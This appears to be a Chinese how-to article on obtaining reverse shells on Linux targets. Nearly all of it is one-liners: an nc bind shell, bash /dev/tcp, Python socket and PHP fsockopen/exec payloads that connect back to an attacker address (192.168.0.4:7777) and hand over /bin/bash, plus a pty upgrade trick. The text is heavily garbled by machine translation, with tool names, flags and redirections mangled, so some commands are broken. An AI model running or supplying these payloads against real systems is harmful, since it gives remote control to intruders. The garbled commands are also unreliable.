数控实现反弹外壳的几种方法?很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
<强>正向反弹外壳强>
ubuntu或者CentOS上面输入
数控-lvp 7777 - e/bin/bash
卡莉上输入
数控ip 7777
正向反弹是目标机先执行数控命令,然后卡莉上再进行数控监听,即可反弹外壳。
需要目标机安装数控。
bash -我在,/dev/tcp/ip/port 0祝辞,1
但首先需要在卡莉上使用数控监听端口:
此方法在ubuntu下不会反弹成功,CentOS可以反弹成功。
反弹外壳的命令如下:
代码如下:python - c“导入操作系统,套接字,子流程;s=socket.socket (socket.AF_INET socket.SOCK_STREAM); s.connect ((& # 39; ip # 39;,端口));os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2), p=subprocess.call ((& # 39;/bin/bash # 39;, & # 39;我# 39;]);“首先,使用数控在卡莉上监听端口:
7777
在CentOS或者ubuntu下使用python去反向连接,输入:
代码如下:python - c“导入操作系统,套接字,子流程;s=socket.socket (socket.AF_INET socket.SOCK_STREAM); s.connect ((& # 39; 192.168.0.4& # 39;, 7777)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2), p=subprocess.call ((& # 39;/bin/bash # 39;, & # 39;我# 39;]);此方法ubuntu和Linux均反弹成功。
首先在卡莉上输入数控监听:
在CentOS或者ubuntu上使用数控去反向连接,命令如下:
nc - e/bin/bash 192.168.0.4 7777
首先在卡莉上输入:
然后在目标机上输入:
php - & # 39; exec (“/bin/bash -我在,/dev/tcp/192.168.0.4/7777") & # 39;
或
php - r & # 39; $袜子=fsockopen (“192.168.0.4", 7777); exec (“/bin/bash - 0祝辞,3 1祝辞,3 2祝辞,3“);& # 39;
注意php反弹外壳的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。
,遇到反弹后不是正常的外壳,可用命令:
python - c & # 39;进口企业;pty.spawn (“/bin/bash") & # 39;
转化为常规的壳。
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。